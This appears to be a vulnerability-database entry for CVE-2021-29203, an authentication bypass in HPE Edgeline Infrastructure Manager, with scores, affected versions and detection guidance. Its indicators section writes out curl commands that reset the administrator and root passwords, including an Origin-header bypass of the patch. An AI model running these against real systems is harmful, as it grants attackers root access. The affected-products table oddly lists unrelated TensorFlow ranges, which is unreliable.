cbcvebase.
CVE-2021-29203
published 2021-05-06

CVE-2021-29203: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
68.29%
99.2th percentile
A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.

Affected

4 ranges
VendorProductVersion rangeFixed in
hpedgeline_infrastructure_manager< 1.221.22
inteloptimization_for_tensorflow>= 0 < 2.6.42.6.4
inteloptimization_for_tensorflow>= 2.7.0 < 2.7.22.7.2
inteloptimization_for_tensorflow>= 2.8.0 < 2.8.12.8.1

Detection & IOCsextracted from sources · hover to see the quote

url/redfish/v1/SessionService/ResetPassword/1
url/redfish/v1/SessionService/Sessions
url/redfish/v1/AccountService/Accounts/1
commandcurl -k --tlsv1.2 -H 'Content-Type: application/json' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/SessionService/ResetPassword/1
commandcurl -ki --tlsv1.2 -H 'content-type: application/json' -d '{"UserName":"Administrator","Password":"attacker"}' https:///redfish/v1/SessionService/Sessions
commandcurl -ki --tlsv1.2 -H 'content-type: application/json' -H 'x-auth-token: eda6c27504c54cf68e1d005742c1ef8c573e5e60' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/AccountService/Accounts/1
commandcurl -k --tlsv1.2 -H 'Content-Type: application/json' -H 'Origin: https://127.0.0.1' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/SessionService/ResetPassword/1
sigma
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
  • Detect unauthenticated PATCH requests to /redfish/v1/SessionService/ResetPassword/1 — this endpoint should only be accessible from the local console (127.0.0.1) and any remote PATCH to it indicates exploitation of the auth bypass.
  • Detect HTTP requests to /redfish/v1/SessionService/ResetPassword/1 that include a spoofed 'Origin: https://127.0.0.1' header from a non-loopback remote IP — this is the v1.22 patch bypass technique.
  • Alert on POST to /redfish/v1/SessionService/Sessions with body containing 'UserName':'Administrator' immediately following a PATCH to /redfish/v1/SessionService/ResetPassword/1 from the same source IP — indicates full attack chain execution.
  • Monitor for PATCH requests to /redfish/v1/AccountService/Accounts/1 with an X-Auth-Token header — this step resets both the Administrator webapp password and the OS root account password, enabling SSH root access.
  • Look for HTTP 201 responses from /redfish/v1/SessionService/Sessions containing both 'X-Auth-Token' and 'PasswordReset' headers — the Nuclei template uses these as confirmation of successful authentication after the bypass.
  • Detect response body containing 'Base.1.0.Created' with HTTP 201 status from /redfish/v1/SessionService/Sessions — this confirms a successful login session was created post-password-reset.
  • ·The v1.22 patch is incomplete — it only checks the Origin header value ('https://127.0.0.1') to restrict password reset to console users, but an attacker can trivially spoof this header remotely. Full mitigation requires upgrading to version 1.23.
  • ·The vulnerable endpoint /redfish/v1/SessionService/ResetPassword/1 is decorated with AllowAll permission class, meaning no authentication is enforced at the framework level — network-layer blocking of this endpoint is an interim mitigation.
  • ·Exploitation of /redfish/v1/AccountService/Accounts/1 resets BOTH the web application Administrator account AND the OS root account simultaneously, meaning a successful attack grants SSH root access to the underlying host.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.